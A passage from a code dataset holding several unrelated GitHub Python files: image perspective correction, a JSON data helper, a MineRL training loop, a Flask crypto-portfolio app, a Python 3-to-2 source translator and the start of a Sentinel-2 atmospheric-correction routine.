hough_lines_threshold)\n Hough_lines(hough_lines_threshold, gray_normalized_kernel_vertical, \"vertical\")\n Hough_lines(hough_lines_threshold, gray_normalized_kernel_horizontal, \"horizontal\")\n Get_intersection_points()\n quadrant_categorization()\n break\n else:\n list_included_values += 1\n\n def find_corner_in_each_quadrant(quadrant): # 判斷:交點是否過度貼近邊界,甚至跑到圖片外。找到符合條件且距離中心點最遠的點\n max_d = 0\n temp_corner = []\n for point in globals()['quadrant_'+str(f'{quadrant}')+'_corner']:\n if (math.sqrt((point[0]-nc/2)**2+(point[1]-nr/2)**2) > max_d) and ((nc/2)-abs(point[0]-(nc/2)) > 40) and ((nr/2)-abs(point[1]-(nr/2)) > 40) and (abs(point[0]-(nc/2))<=(nc/2)) and (abs(point[1]-(nr/2))<=(nr/2)): # (距離中心點>max_d)&(距離邊界>40px)&(點不能超出邊界)\n max_d = math.sqrt((point[0]-nc/2)**2+(point[1]-nr/2)**2)\n temp_corner = point\n return temp_corner\n\n def fine_distance_to_edge(x, y): # 判斷:交點是否位於靠近圖片外圍的區域\n if (abs(x-(nc/2)) > (nc/6)) and (abs(y-(nr/2)) > (nr/6)): # (距離中心點 > 1/6)\n return True\n else:\n return False\n\n for quadrant in range(1,5): # 做條件判斷,如果有交點不符合條件,則降低Hough_lines的Threshold,然後全部重新再算一次\n reasonable_point = False\n 
temp_corner = find_corner_in_each_quadrant(quadrant)\n while reasonable_point is False:\n if fine_distance_to_edge(temp_corner[0], temp_corner[1]) is True:\n corner_each_quadrant.append(temp_corner)\n reasonable_point = True\n else:\n hough_lines_threshold -= 10\n print(\"Current Threshold:\", hough_lines_threshold)\n Hough_lines(hough_lines_threshold, gray_normalized_kernel_vertical, \"vertical\")\n Hough_lines(hough_lines_threshold, gray_normalized_kernel_horizontal, \"horizontal\")\n Get_intersection_points()\n quadrant_categorization()\n temp_corner = find_corner_in_each_quadrant(quadrant)\n\n for corner in corner_each_quadrant: # 畫出4個角落點\n cv.circle(src, (int(corner[0]),int(corner[1])), 15, (0, 255, 0), -1)\n\n\n\n def Perspective_transform(): # 透視轉換\n pts1 = np.float32([corner_each_quadrant[0], corner_each_quadrant[1], corner_each_quadrant[2], corner_each_quadrant[3]])\n pts2 = np.float32([[corner_each_quadrant[0][0]-corner_each_quadrant[1][0], 0], [0, 0], [0, corner_each_quadrant[2][1]-corner_each_quadrant[1][1]], [corner_each_quadrant[0][0]-corner_each_quadrant[1][0], corner_each_quadrant[2][1]-corner_each_quadrant[1][1]]])\n T = cv.getPerspectiveTransform(pts1, pts2)\n img2 = cv.warpPerspective(src2, T, (corner_each_quadrant[0][0]-corner_each_quadrant[1][0], corner_each_quadrant[2][1]-corner_each_quadrant[1][1]))\n return img2\n\n\n\n Hough_lines(hough_lines_threshold, gray_normalized_kernel_vertical, \"vertical\") # 霍夫直線偵測 找垂直線\n Hough_lines(hough_lines_threshold, gray_normalized_kernel_horizontal, \"horizontal\") # 霍夫直線偵測 找水平線\n\n Get_intersection_points() # 拿直線方程式取交點\n\n Find_4_corners() # 找出4個角落點\n # print('4 corners:',corner_each_quadrant)\n\n # print(\"hough_lines_threshold:\", hough_lines_threshold)\n # print('Intersection Points [x, y]:', intersection_points)\n # print('Intersection Points:', len(intersection_points))\n\n img2 = Perspective_transform() # 透視轉換\n\n cv.imwrite(f'{file_name}'+\"_gray_normalized_kernel_canny_houghlines_\"+f'{canny_threshold}'+\"-\"+f'{canny_threshold}'+\"-\"+f'{hough_lines_threshold}'+\".jpg\", src) # 生成 霍夫直線偵測 的結果圖\n cv.imwrite(f'{file_name}' + \"_final_result.jpg\", img2) # 生成 透視轉換後 的結果圖\n cv.imwrite(\"images_todo\\\\results\\\\\" + f'{file_name}' + \"_final_result.jpg\", img2) # 在\"images_todo/results\"資料夾內生成 透視轉換後 的結果圖\n\n print(\"\\nHough_lines Finished.\\n\")\n print(\"\\\"\" + f'{file_name}'+ \"\\\" DONE.\\n-----\")\n return img2\n\n\nif __name__ == \"__main__\":\n start = time.time() # 記錄開始執行程式的時間\n while 1:\n if (filter_size < 5) or (filter_size % 2 == 0):\n # filter_size: 33 is default\n filter_size = int(input(\"Convolution Filter Size (n*n)\\nDefault: 33*33\\nPlease type in the n you want(odd and >=5): \")) # 使用者輸入卷積的Filter大小\n else:\n break\n for formats in image_formats: # 抓取\"images_todo\"資料夾內所有要掃描的圖片\n for file in glob.glob(\"images_todo\\\\*\"+f'{formats}', recursive=True):\n file_name = file[(file.find('\\\\')+1):]\n file_name = file_name[:file_name.find('.')]\n main(file_name) # 執行主程式\n images.append( Image.open(\"images_todo\\\\results\\\\\" + f'{file_name}' + \"_final_result.jpg\") )\n image1 = images[0]\n images.pop(0)\n image1.save(\"images_todo\\\\results\\\\\"+\"Combination_\"+f'{return_time()}'+\"_filter_\"+f'{filter_size}'+\".pdf\", save_all=True, append_images=images) # 輸出合併後的PDF檔\n print(\"Saved File:\", \"images_todo/results/\"+\"Combination_\"+f'{return_time()}'+\".pdf\") # 印出PDF檔的路徑及檔名\n end = time.time() # 記錄程式結束執行的時間\n print(\"Code Runtime: {:.1f}s\".format(end-start)) # 
印出程式執行所花的時間","repo_name":"VincentLi1216/TomatoSoup","sub_path":"ImageProcessing/Hough_lines_Final_Version.py","file_name":"Hough_lines_Final_Version.py","file_ext":"py","file_size_in_byte":12817,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"17089892290","text":"import pandas as pd\nimport json\n\n\ndef add_data(organisation, key, url, year):\n file_path = \"ForestOps/data.json\"\n # Load existing data from the JSON file\n with open(file_path, 'r') as f:\n data = json.load(f)\n\n # Check if the organization already exists in the data\n if organisation in data['api']:\n # Check if the key already exists in the organization\n if key in data['api'][organisation]:\n # Check if the year is different from the existing key\n if str(year) in data['api'][organisation][key]:\n print(f\"The key '{key}' already exists in the organization '{organisation}' for the year {year}.\")\n return\n\n # Add the new year and URL to the existing key\n data['api'][organisation][key][str(year)] = url\n else:\n # Add the new key, URL, and year to the organization\n data['api'][organisation][key] = {\n str(year): url\n }\n else:\n # Create a new organization and add the key, URL, and year\n data['api'][organisation] = {\n key: {\n str(year): url\n }\n }\n\n # Write the updated data back to the JSON file\n with open(file_path, 'w') as f:\n json.dump(data, f, indent=4)\n\n print(\"Data added successfully!\")\n\n\n# # Usage example\n# file_path = \"ForestOps/data.json\"\n# add_data(file_path, \"Natural England\", \"Ancient Woodland England\", \"https://example.com/ancient-woodland-2023\", 2023)\n#\n# # Usage example\n# add_data(\"Natural England\", \"Another Key\", \"https://example.com/another-key\", 2023)\n\n\ndef flatten_json(data, prefix='', rows=None, level=0):\n if rows is None:\n rows = []\n\n if isinstance(data, dict):\n for key, value in data.items():\n new_prefix = prefix + '_' + key if prefix else key\n\n if isinstance(value, dict):\n flatten_json(value, prefix=new_prefix, rows=rows, level=level + 1)\n else:\n rows.append([level, new_prefix, value])\n elif isinstance(data, list):\n for i, value in enumerate(data):\n new_prefix = prefix + '_' + str(i) if prefix else str(i)\n\n if isinstance(value, (dict, list)):\n flatten_json(value, prefix=new_prefix, rows=rows, level=level + 1)\n else:\n rows.append([level, new_prefix, value])\n\n return rows\n\ndef data_sources():\n file_path = \"ForestOps/data.json\"\n # Load the JSON data\n with open(file_path) as f:\n data = json.load(f)\n\n # Flatten the nested JSON\n rows = flatten_json(data)\n\n # Create a DataFrame from the rows\n df = pd.DataFrame(rows, columns=['Level', 'Key', 'Source'])\n\n # Split the Key column into separate columns\n df[['Source_type', 'Organisation', 'Layer', 'Year']] = df['Key'].str.split('_', expand=True)\n\n # Reorder the DataFrame columns\n df = df[['Source_type', 'Organisation', 'Layer', 'Year', 'Source']]\n\n # Sort the DataFrame by organisation, layer, and year\n df = df.sort_values(['Organisation', 'Layer', 'Year'], ascending=[True, True, True])\n\n # Reset the index of the DataFrame\n df = df.reset_index(drop=True)\n\n # Return the DataFrame\n return df\n\n\n# Usage example\n# file_path = \"ForestOps/data.json\"\n# df = display_data_as_dataframe(file_path)\n# print(df)\n\n\n# Usage example\n# df = display_data_as_dataframe()\n# 
print(df)\n","repo_name":"SpatialDigger/GeoOps","sub_path":"ForestOps/data_ops.py","file_name":"data_ops.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34841834356","text":"import minerl\n\nfrom backtrack import get_visibles\nfrom model import LocationModel\nfrom util.experts_util import SingularIterator\n\n\nenv_name = 'MineRLTreechop-v0'\nmodel = LocationModel()\n\nback_traj = None\nnum_trajs = 10000\niter = SingularIterator(env_name, num_trajs=num_trajs)\n\ntest_obs, test_locations, test_angles = None, None, None\n\nfor t in range(num_trajs):\n if t and t % 100 == 0:\n print(f'timestep {t}')\n\n traj = iter.get_one_traj()\n\n for i, (obs, rew, done, act) in enumerate(traj):\n if rew > 0: # acquired a wood\n back_traj = traj[:i+1]\n\n if back_traj is None:\n continue\n\n obses, locations, angles = get_visibles(back_traj)\n if not obses:\n continue\n\n test_obs, test_locations, test_angles = obses, locations, angles\n\n print('training')\n model.train(obses, locations, angles)\n back_traj = None\n\n\npred_locations, pred_angles = model.predict(test_obs)\nprint(pred_locations.mean(), ((pred_locations - test_locations) **2).mean())\n","repo_name":"albertwujj/minerl","sub_path":"item_locator/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3050860214","text":"# app.py\n# Daniel Kogan\n# Nov 14 2021\n\n# Flask Imports\nfrom flask import Flask, escape, request, render_template, session, redirect, send_file, url_for\nfrom flask import Flask\n# os\nimport os\n# wallet import\nfrom wallet import *\n\napp = Flask(__name__)\napp.secret_key = SERVERKEY\n\ndef plot_all_coins():\n pf.plotpf() # update graph\n for coin in cb.all_coin_wallets():\n cb.current_price(coin)\n pf.plotpfCoin(coin)\n pf.plotCoin(coin)\n\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef main():\n if request.method == \"POST\":\n print(cb.balance()) # UPDATES FIREBASE DATA\n os.remove(\"static/graph/Portfolio.png\") # refresh graph\n plot_all_coins()\n bal = str.splitlines(cb.balance())\n return render_template('main.html', bal=bal, imgsrc=\"static/graph/Portfolio.png\")\n\n# crypto pages\n@app.route('/')\ndef coin_render(coin):\n coin = coin.upper()\n print(coin)\n if coin not in cb.all_coin_wallets():\n return redirect(\"/404\")\n else:\n bal = str.splitlines(cb.balance()) \n if not (os.path.exists(f'static/graph/{coin}.png')):\n cb.current_price(coin)\n pf.plotpfCoin(coin)\n pf.plotCoin(coin)\n return render_template('main.html', bal=bal, imgsrc=f\"static/graph/{coin}.png\")\n\n@app.route('//chart', methods=['GET'])\ndef birthchart(coin): \n coin = coin.upper()\n if coin not in cb.all_coin_wallets():\n return redirect(\"/404\")\n else: \n if not os.path.exists(f'static/birthcharts/{coin}NatalChart.svg'):\n astro.create_chart(coin)\n return f\" {coin} Chart \"\n\n@app.route('/coinPostRqs', methods=[\"GET\", \"POST\"])\ndef receive():\n if request.method == \"POST\":\n coin = request.form['data']\n print(cb.balance())\n os.remove(f\"static/graph/{coin}.png\")\n plot_all_coins()\n return \"reading get request⏳\"\n\n@app.route('/404')\ndef page_not_found():\n return f\" error 404 page not found lol\"\n\nif __name__ == '__main__':\n 
app.run(use_reloader=True,host='0.0.0.0')\n","repo_name":"daminals/StarStruck","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"10675409665","text":"\"\"\"\nКуйвалайнен Д.А.\nkuyvalaynen@gmail.com\nЗЕБЗ-01-16\n\"\"\"\n\nfrom gdp_analyzer import GDPAnalyzer\n\nif __name__ == \"__main__\":\n gdp = GDPAnalyzer()\n try:\n gdp.load_data(filename=\"world_bank_gdp_data_2017-02-01.csv\")\n print(gdp)\n gdp.show_plot()\n except Exception as err:\n print(\"Во время работы приложения произошла ошибка:\", err)\n","repo_name":"DenisKuivalainen/Python_test","sub_path":"Level_2/Тема 12/Задание 3/Code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16634803380","text":"from __future__ import print_function\n\nimport os\nimport re\n\n# List of fixers from lib3to2: absimport annotations bitlength bool\n# bytes classdecorator collections dctsetcomp division except features\n# fullargspec funcattrs getcwd imports imports2 input int intern\n# itertools kwargs memoryview metaclass methodattrs newstyle next\n# numliterals open print printfunction raise range reduce setliteral\n# str super throw unittest unpacking with\n\nALPHANUM = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'\n\nKEYWORDS = set(['False', 'None', 'True', 'and', 'as', 'assert', 'break',\n 'class', 'continue', 'def', 'del', 'elif', 'else', 'except',\n 'finally', 'for', 'from', 'global', 'if', 'import', 'in', 'is',\n 'lambda', 'nonlocal', 'not', 'or', 'pass', 'raise', 'return',\n 'try', 'while', 'with', 'yield'])\n\n# This regexp is used to find the tokens\ntokenProg = re.compile(\n '(#)|' +\t\t\t\t\t# Comment or\n '(' + \t\t\t\t\t\t# Begin of string group (group 1)\n '[bB]?[uU]?[rR]?' +\t\t\t# Possibly bytes, unicode, raw\n '(\"\"\"|\\'\\'\\'|\"|\\')' +\t\t# String start (triple qoutes first, group 3)\n ')|' + \t\t\t\t\t# End of string group\n '([' + ALPHANUM + '_]+)' \t# Identifiers/numbers (group 1) or\n )\n\n# regexps to find the end of a comment or string\nendProgs = {\n \"#\": re.compile(r\"\\r?\\n\"),\n \"'\": re.compile(r\"([^\\\\])(\\\\\\\\)*'\"),\n '\"': re.compile(r'([^\\\\])(\\\\\\\\)*\"'),\n \"'''\": re.compile(r\"([^\\\\])(\\\\\\\\)*'''\"),\n '\"\"\"': re.compile(r'([^\\\\])(\\\\\\\\)*\"\"\"'),\n }\n\n\nclass CancelTranslation(RuntimeError):\n pass # to cancel a translation\n\n\nclass Token:\n \"\"\" A token in the source code. The type of token can be a comment,\n string, keyword, number or identifier. It has functionality to get\n information on neighboring tokens and neighboring characters. 
This\n should be enough to do all necessary translations.\n \n If the ``fix`` attribute is set, that string will replace the\n current string.\n \"\"\"\n \n def __init__(self, total_text, type, start, end):\n self.total_text = total_text\n self.type = type\n self.start = start\n self.end = end\n self.fix = None\n \n def __repr__(self):\n return '' % self.text\n \n def find_forward(self, s):\n \"\"\" Find the position of a character to the right.\n \"\"\"\n return self.total_text.find(s, self.end)\n \n def find_backward(self, s):\n \"\"\" Find the position of a character to the left.\n \"\"\"\n return self.total_text.rfind(s, 0, self.start)\n \n @property\n def text(self):\n \"\"\" The original text of the token.\n \"\"\"\n return self.total_text[self.start:self.end]\n \n @property\n def prev_char(self):\n \"\"\" The first non-whitespace char to the left of this token\n that is still on the same line.\n \"\"\"\n i = self.find_backward('\\n')\n i = i if i >= 0 else 0\n line = self.total_text[i:self.start]\n line = re.sub(r\"\\s+\", '', line) # remove whitespace\n return line[-1:] # return single char or empty string\n \n @property\n def next_char(self):\n \"\"\" Get the first non-whitespace char to the right of this token\n that is still on the same line.\n \"\"\"\n i = self.find_forward('\\n')\n i = i if i >= 0 else len(self.total_text)\n line = self.total_text[self.end:i]\n line = re.sub(r\"\\s+\", '', line) # remove whitespace\n return line[:1] # return single char or empty string\n \n @property\n def indentation(self):\n \"\"\" The number of chars that the current line uses for indentation.\n \"\"\"\n i = max(0, self.find_backward('\\n'))\n line1 = self.total_text[i+1:self.start]\n line2 = line1.lstrip()\n return len(line1) - len(line2)\n \n @property\n def line_tokens(self):\n \"\"\" All (non-comment) tokens that are on the same line.\n \"\"\"\n i1, i2 = self.find_backward('\\n'), self.find_forward('\\n')\n i1 = i1 if i1 >= 0 else 0\n i2 = i2 if i2 >= 0 else len(self.total_text) \n t = self\n tokens = []\n while t.prev_token and t.prev_token.start >= i1:\n t = t.prev_token\n tokens.append(t)\n while (t.next_token and t.next_token.end <= i2 and \n t.next_token.type != 'comment'):\n t = t.next_token\n tokens.append(t)\n return tokens\n\n\nclass BaseTranslator:\n \"\"\" Translate Python code. 
One translator instance is used to\n translate one file.\n \"\"\"\n \n def __init__(self, text):\n self._text = text\n self._tokens = None\n \n @property\n def tokens(self):\n \"\"\" The list of tokens.\n \"\"\"\n if self._tokens is None:\n self._parse()\n return self._tokens\n \n def _parse(self):\n \"\"\" Generate tokens by parsing the code.\n \"\"\"\n self._tokens = []\n pos = 0\n \n # Find tokens\n while True:\n token = self._find_next_token(pos)\n if token is None:\n break\n self._tokens.append(token)\n pos = token.end\n \n # Link tokens\n if self._tokens:\n self._tokens[0].prev_token = None\n self._tokens[len(self._tokens)-1].next_token = None\n for i in range(0, len(self._tokens)-1):\n self._tokens[i].next_token = self._tokens[i+1]\n for i in range(1, len(self._tokens)):\n self._tokens[i].prev_token = self._tokens[i-1]\n \n def _find_next_token(self, pos):\n \"\"\" Returns a token or None if no new tokens can be found.\n \"\"\"\n \n text = self._text\n \n # Init tokens, if pos too large, were done\n if pos > len(text):\n return None\n \n # Find the start of the next string or comment\n match = tokenProg.search(text, pos)\n \n if not match:\n return None\n if match.group(1):\n # Comment\n start = match.start()\n end_match = endProgs['#'].search(text, start+1)\n end = end_match.start() if end_match else len(text)\n return Token(text, 'comment', start, end)\n elif match.group(2) is not None:\n # String - we start the search for the end-char(s) at end-1,\n # because our regexp has to allow for one char (which is\n # not backslash) before the end char(s).\n start = match.start()\n string_style = match.group(3)\n end = endProgs[string_style].search(text, match.end() - 1).end()\n return Token(text, 'string', start, end)\n else:\n # Identifier (\"a word or number\") Find out whether it is a key word\n identifier = match.group(4)\n tokenArgs = match.start(), match.end()\n if identifier in KEYWORDS:\n return Token(text, 'keyword', *tokenArgs)\n elif identifier[0] in '0123456789':\n return Token(text, 'number', *tokenArgs)\n else:\n return Token(text, 'identifier', *tokenArgs)\n \n def translate(self):\n \"\"\" Translate the code by applying fixes to the tokens. Returns\n the new code as a string.\n \"\"\"\n \n # Collect fixers. Sort by name, so at least its consistent.\n fixers = []\n for name in sorted(dir(self)):\n if name.startswith('fix_'):\n fixers.append(getattr(self, name))\n \n # Apply fixers\n new_tokens = []\n for i, token in enumerate(self.tokens):\n for fixer in fixers:\n new_token = fixer(token)\n if isinstance(new_token, Token):\n assert new_token.start == new_token.end\n if new_token.start <= token.start:\n new_tokens.append((i, new_token))\n else:\n new_tokens.append((i+1, new_token))\n \n # Insert new tokens\n for i, new_token in reversed(new_tokens):\n self._tokens.insert(i, new_token)\n \n return self.dumps()\n \n def dumps(self):\n \"\"\" Return a string with the translated code.\n \"\"\"\n text = self._text\n pos = len(self._text)\n pieces = []\n for t in reversed(self.tokens):\n pieces.append(text[t.end:pos])\n pieces.append(t.fix if t.fix is not None else t.text)\n pos = t.start\n pieces.append(text[:pos])\n return ''.join(reversed(pieces))\n \n @classmethod\n def translate_dir(cls, dirname, skip=()):\n \"\"\" Classmethod to translate all .py files in the given\n directory and its subdirectories. Skips files that match names\n in skip (which can be full file names, absolute paths, and paths\n relative to dirname). 
Any file that imports 'print_function'\n from __future__ is cancelled.\n \"\"\"\n dirname = os.path.normpath(dirname)\n skip = [os.path.normpath(p) for p in skip]\n for root, dirs, files in os.walk(dirname):\n for fname in files:\n if fname.endswith('.py'):\n filename = os.path.join(root, fname)\n relpath = os.path.relpath(filename, dirname)\n if fname in skip or relpath in skip or filename in skip:\n print('%s skipped: %r' % (cls.__name__, relpath))\n continue\n code = open(filename, 'rb').read().decode('utf-8')\n try:\n new_code = cls(code).translate()\n except CancelTranslation:\n print('%s cancelled: %r' % (cls.__name__, relpath))\n else:\n with open(filename, 'wb') as f:\n f.write(new_code.encode('utf-8'))\n print('%s translated: %r' % (cls.__name__, relpath))\n\n\nclass LegacyPythonTranslator(BaseTranslator):\n \"\"\" A Translator to translate Python 3 to Python 2.7.\n \"\"\"\n \n FUTURES = ('print_function', 'absolute_import', 'with_statement',\n 'unicode_literals', 'division')\n \n def dumps(self):\n return '# -*- coding: utf-8 -*-\\n' + BaseTranslator.dumps(self)\n \n def fix_cancel(self, token):\n \"\"\" Cancel translation if using `from __future__ import xxx`\n \"\"\"\n if token.type == 'keyword' and (token.text == 'from' and\n token.next_token.text == '__future__'):\n for future in self.FUTURES:\n if any([t.text == future for t in token.line_tokens]):\n # Assume this module is already Python 2.7 compatible\n raise CancelTranslation()\n \n def fix_future(self, token):\n \"\"\" Fix print_function, absolute_import, with_statement.\n \"\"\"\n \n status = getattr(self, '_future_status', 0)\n if status == 2:\n return # Done\n \n if status == 0 and token.type == 'string':\n self._future_status = 1 # docstring\n elif token.type != 'comment':\n self._future_status = 2 # done\n i = max(0, token.find_backward('\\n'))\n t = Token(token.total_text, '', i, i)\n t.fix = '\\nfrom __future__ import %s\\n' % (', '.join(self.FUTURES))\n return t\n \n def fix_newstyle(self, token):\n \"\"\" Fix to always use new style classes.\n \"\"\"\n if token.type == 'keyword' and token.text == 'class':\n nametoken = token.next_token\n if nametoken.next_char != '(':\n nametoken.fix = '%s(object)' % nametoken.text\n \n def fix_super(self, token):\n \"\"\" Fix super() -> super(Cls, self)\n \"\"\"\n # First keep track of the current class\n if token.type == 'keyword':\n if token.text == 'class':\n self._current_class = token.indentation, token.next_token.text\n elif token.text == 'def':\n indent, name = getattr(self, '_current_class', (0, ''))\n if token.indentation <= indent:\n self._current_class = 0, ''\n \n # Then check for super\n if token.type == 'identifier' and token.text == 'super':\n if token.prev_char != '.' and token.next_char == '(':\n i = token.find_forward(')')\n sub = token.total_text[token.end:i+1]\n if re.sub(r\"\\s+\", '', sub) == '()':\n indent, name = getattr(self, '_current_class', (0, ''))\n if name:\n token.end = i + 1\n token.fix = 'super(%s, self)' % name\n \n # Note: we use \"from __future__ import unicode_literals\"\n # def fix_unicode_literals(self, token):\n # if token.type == 'string':\n # if token.text.lstrip('r').startswith(('\"', \"'\")): # i.e. 
no b/u\n # token.fix = 'u' + token.text\n \n def fix_unicode(self, token):\n if token.type == 'identifier':\n if token.text == 'chr' and token.next_char == '(':\n # Calling chr\n token.fix = 'unichr'\n elif token.text == 'str' and token.next_char == '(':\n # Calling str\n token.fix = 'unicode'\n elif token.text == 'str' and (token.next_char == ')' and\n token.prev_char == '(' and\n token.line_tokens[0].text == 'class'):\n token.fix = 'unicode'\n elif token.text == 'isinstance' and token.next_char == '(':\n # Check for usage of str in isinstance\n end = token.find_forward(')')\n t = token.next_token\n while t.next_token and t.next_token.start < end:\n t = t.next_token\n if t.text == 'str':\n t.fix = 'basestring'\n \n def fix_range(self, token):\n if token.type == 'identifier' and token.text == 'range':\n if token.next_char == '(' and token.prev_char != '.':\n token.fix = 'xrange'\n \n def fix_encode(self, token):\n if token.type == 'identifier' and token.text in('encode', 'decode'):\n if token.next_char == '(' and token.prev_char == '.':\n end = token.find_forward(')')\n if not (token.next_token and token.next_token.start < end):\n token.fix = token.text + '(\"utf-8\")'\n token.end = end + 1\n \n def fix_getcwd(self, token):\n \"\"\" Fix os.getcwd -> os.getcwdu\n \"\"\"\n if token.type == 'identifier' and token.text == 'getcwd':\n if token.next_char == '(':\n token.fix = 'getcwdu'\n \n def fix_imports(self, token):\n \"\"\" import xx.yy -> import zz\n \"\"\"\n if token.type == 'keyword' and token.text == 'import': \n tokens = token.line_tokens\n \n # For each import case ...\n for name, replacement in self.IMPORT_MAPPING.items():\n parts = name.split('.')\n # Walk over tokens to find start of match\n for i in range(len(tokens)):\n if (tokens[i].text == parts[0] and\n len(tokens[i:]) >= len(parts)):\n # Is it a complete match?\n for j, part in enumerate(parts):\n if tokens[i+j].text != part:\n break\n else:\n # Match, marge tokens\n tokens[i].end = tokens[i+len(parts)-1].end\n tokens[i].fix = replacement\n for j in range(1, len(parts)):\n tokens[i+j].start = tokens[i].end\n tokens[i+j].end = tokens[i].end\n tokens[i+j].fix = ''\n break # we have found the match\n \n def fix_imports2(self, token):\n \"\"\" from xx.yy import zz -> from vv import zz\n \"\"\"\n if token.type == 'keyword' and token.text == 'import': \n tokens = token.line_tokens\n \n # We use the fact that all imports keys consist of two names\n if tokens[0].text == 'from' and len(tokens) == 5:\n if tokens[3].text == 'import':\n xxyy = tokens[1].text + '.' 
+ tokens[2].text\n name = tokens[4].text\n if xxyy in self.IMPORT_MAPPING2:\n for possible_module in self.IMPORT_MAPPING2[xxyy]:\n if name in self.PY2MODULES[possible_module]:\n tokens[1].fix = possible_module\n tokens[1].end = tokens[2].end\n tokens[2].start = tokens[2].end\n break\n\n\n # Map simple import paths to new import import paths\n IMPORT_MAPPING = {\n \"reprlib\": \"repr\",\n \"winreg\": \"_winreg\",\n \"configparser\": \"ConfigParser\",\n \"copyreg\": \"copy_reg\",\n \"queue\": \"Queue\",\n \"socketserver\": \"SocketServer\",\n \"_markupbase\": \"markupbase\",\n \"test.support\": \"test.test_support\",\n \"dbm.bsd\": \"dbhash\",\n \"dbm.ndbm\": \"dbm\",\n \"dbm.dumb\": \"dumbdbm\",\n \"dbm.gnu\": \"gdbm\",\n \"html.parser\": \"HTMLParser\",\n \"html.entities\": \"htmlentitydefs\",\n \"http.client\": \"httplib\",\n \"http.cookies\": \"Cookie\",\n \"http.cookiejar\": \"cookielib\",\n \"urllib.robotparser\": \"robotparser\",\n \"xmlrpc.client\": \"xmlrpclib\",\n \"builtins\": \"__builtin__\",\n }\n \n \n # Map import paths to ... a set of possible import paths\n IMPORT_MAPPING2 = {\n 'urllib.request': ('urllib2', 'urllib'),\n 'urllib.error': ('urllib2', 'urllib'),\n 'urllib.parse': ('urllib2', 'urllib', 'urlparse'),\n 'dbm.__init__': ('anydbm', 'whichdb'),\n 'http.server': ('CGIHTTPServer', 'SimpleHTTPServer', 'BaseHTTPServer'),\n 'xmlrpc.server': ('DocXMLRPCServer', 'SimpleXMLRPCServer'),\n }\n\n # This defines what names are in specific Python 2 modules\n PY2MODULES = {\n 'urllib2' : (\n 'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler',\n 'AbstractHTTPHandler', 'BaseHandler', 'CacheFTPHandler',\n 'FTPHandler', 'FileHandler', 'HTTPBasicAuthHandler',\n 'HTTPCookieProcessor', 'HTTPDefaultErrorHandler',\n 'HTTPDigestAuthHandler', 'HTTPError', 'HTTPErrorProcessor',\n 'HTTPHandler', 'HTTPPasswordMgr',\n 'HTTPPasswordMgrWithDefaultRealm', 'HTTPRedirectHandler',\n 'HTTPSHandler', 'OpenerDirector', 'ProxyBasicAuthHandler',\n 'ProxyDigestAuthHandler', 'ProxyHandler', 'Request',\n 'StringIO', 'URLError', 'UnknownHandler', 'addinfourl',\n 'build_opener', 'install_opener', 'parse_http_list',\n 'parse_keqv_list', 'randombytes', 'request_host', 'urlopen'),\n 'urllib' : (\n 'ContentTooShortError', 'FancyURLopener', 'URLopener',\n 'basejoin', 'ftperrors', 'getproxies',\n 'getproxies_environment', 'localhost', 'pathname2url',\n 'quote', 'quote_plus', 'splitattr', 'splithost',\n 'splitnport', 'splitpasswd', 'splitport', 'splitquery',\n 'splittag', 'splittype', 'splituser', 'splitvalue',\n 'thishost', 'unquote', 'unquote_plus', 'unwrap',\n 'url2pathname', 'urlcleanup', 'urlencode', 'urlopen',\n 'urlretrieve',),\n 'urlparse' : (\n 'parse_qs', 'parse_qsl', 'urldefrag', 'urljoin',\n 'urlparse', 'urlsplit', 'urlunparse', 'urlunsplit'),\n 'dbm' : (\n 'ndbm', 'gnu', 'dumb'),\n 'anydbm' : (\n 'error', 'open'),\n 'whichdb' : (\n 'whichdb',),\n 'BaseHTTPServer' : (\n 'BaseHTTPRequestHandler', 'HTTPServer'),\n 'CGIHTTPServer' : (\n 'CGIHTTPRequestHandler',),\n 'SimpleHTTPServer' : (\n 'SimpleHTTPRequestHandler',),\n 'DocXMLRPCServer' : (\n 'DocCGIXMLRPCRequestHandler', 'DocXMLRPCRequestHandler',\n 'DocXMLRPCServer', 'ServerHTMLDoc', 'XMLRPCDocGenerator'),\n }\n\n\nif __name__ == '__main__':\n # Awesome for testing\n \n code = \"\"\"\n \"\"\"\n \n t = LegacyPythonTranslator(code)\n new_code = t.translate()\n print(t.tokens)\n print('---')\n 
print(new_code)\n","repo_name":"flexxui/pscript","sub_path":"translate_to_legacy.py","file_name":"translate_to_legacy.py","file_ext":"py","file_size_in_byte":20857,"program_lang":"python","lang":"en","doc_type":"code","stars":247,"dataset":"github-code","pt":"81"} +{"seq_id":"9278309826","text":"import os\nimport sys\nimport shutil\nimport argparse\nimport requests\nimport warnings\nwarnings.filterwarnings(\"ignore\") \nimport numpy as np\nfrom glob import glob\nfrom SIAC.get_MCD43 import get_mcd43\nfrom datetime import datetime\nfrom SIAC.the_aerosol import solve_aerosol\nfrom SIAC.create_logger import create_logger\nfrom SIAC.the_correction import atmospheric_correction\nfrom SIAC.s2_preprocessing import s2_pre_processing\nfrom SIAC.downloaders import downloader\nfrom SIAC.multi_process import parmap\nfrom os.path import expanduser\nhome = expanduser(\"~\")\nfile_path = os.path.dirname(os.path.realpath(__file__))\n\ndef SIAC_S2(s2_t, send_back = False, mcd43 = home + '/MCD43/', vrt_dir = home + '/MCD43_VRT/', aoi = None, \n global_dem = '/vsicurl/http://www2.geog.ucl.ac.uk/~ucfafyi/eles/global_dem.vrt', \\\n cams_dir = '/vsicurl/http://www2.geog.ucl.ac.uk/~ucfafyi/cams/', jasmin = False):\n if not os.path.exists(file_path + '/emus/'):\n os.mkdir(file_path + '/emus/')\n if len(glob(file_path + '/emus/' + 'isotropic_MSI_emulators_*_x?p_S2?.pkl')) < 12:\n url = 